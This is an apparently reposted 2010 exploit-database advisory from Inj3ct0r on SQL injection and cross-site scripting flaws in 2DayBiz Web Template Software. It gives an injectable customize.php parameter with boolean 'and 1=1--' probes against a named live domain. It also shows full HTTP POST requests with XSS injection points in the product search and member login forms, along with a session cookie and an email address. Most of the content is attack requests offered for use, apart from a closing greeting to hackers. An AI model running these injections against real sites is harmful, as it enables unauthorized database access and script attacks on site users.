Home / os / win7

2DayBiz - The Web Template Software SQL Injection & XSS

Posted on 24 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>2DayBiz - The Web Template Software SQL Injection &amp; XSS vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== 2DayBiz - The Web Template Software SQL Injection &amp; XSS vulnerability ===================================================================== $------------------------------------------------------------------------------------------------------------------- $ 2daybiz - The Web Template Software SQL injection and XSS vulnerability $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :http://www.2daybiz.com/webtemplatesoftware.html $ Date :06/24/2010 $ Email :sangteamtham@gmail.com $ $****************************************************************************************** 1.SQL injection http://server/customize.php?tid=[id]+[SQL] 2.XSS 2.a : search products module Here is my header: http://www.2daytemplates.com/category.php POST /category.php HTTP/1.1 Host: www.2daytemplates.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.2daytemplates.com/category.php Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276 Content-Type: application/x-www-form-urlencoded Content-Length: 168 category=0&amp;product=0&amp;keyword=[XSS here]&amp;itemno=ssss&amp;templates_per_page=9&amp;search=Search 2.b: Login module http://www.2daytemplates.com/memberlogin.php POST /memberlogin.php HTTP/1.1 Host: www.2daytemplates.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.2daytemplates.com/memberlogin.php Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276 Content-Type: application/x-www-form-urlencoded Content-Length: 157 email=sangteamtham_hce%40ymail.com&amp;password=[XSS Here]opage=&amp;Submit=Login XSS here such as: &quot;&gt;&quot;&gt; $****************************************************************************************** $Demo: $ http://www.2daytemplates.com/customize.php?tid=1314+and+1=1-- $ http://www.2daytemplates.com/customize.php?tid=1314+and+1=0-- $ $ $ $****************************************************************************************** $ Greetz to: All Vietnamese hackers and Hackers out there researching for more security $ $ $-------------------------------------------------------------------------------------------------------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP